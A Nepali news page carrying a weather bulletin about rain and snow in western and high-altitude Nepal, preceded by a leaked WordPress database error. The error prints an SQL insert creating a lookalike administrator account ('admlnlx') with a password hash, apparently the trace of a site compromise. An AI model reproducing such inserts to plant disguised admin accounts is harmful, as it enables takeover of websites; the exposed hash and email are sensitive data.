WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByEY0J9l8PkWjVrZqSngtu8zOK/JV/0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 06:56:59', '', 'admlnlx', 'admlnlx')
काठमाडौं । शुक्रवार साँझबाट वर्षा र हिमपात गराउने पश्चिमी वायु प्रणाली नेपाल भित्रिने भएको छ। यसको असर शनिवारसम्म रहने मौसम पूर्वानुमान महाशाखाले जनाएको छ ।
महाशाखाले विशेष बुलेटिन जारी गरी शुक्रवार साँझबाट भित्रिने पश्चिमी न्यूनचापीय प्रणालीका कारण सुदूरपश्चिम र कर्णाली प्रदेशका धेरै स्थान र लुम्बिनीका केही स्थानमा हल्कादेखि मध्यम वर्षा हुने बताएको छ।
त्यस्तै गण्डकी, बागमती, मधेस र कोशीका थोरै स्थानमा हलुका वर्षाको सम्भावना रहेको पनि विभागले जनाएको छ। महाशाखाका अनुसार शनिवारसम्म सुदूरपश्चिम र कर्णालीका उच्च पहाडी तथा हिमाली भूभागका अधिकांश स्थान तथा गण्डकी, वागमती र कोशीका उच्च पहाडी तथा हिमाली भूभागका केही स्थानमा हल्कादेखि मध्यम हिमपात हुने देखिन्छ ।
यो मौसम प्रणालीको असरले तापक्रम समेत घट्ने र चिसो बढ्ने भएकाले वृद्ध, वृद्धा, बालकाललिकालाई सचेत रहन पनि विभागले जनाएको छ ।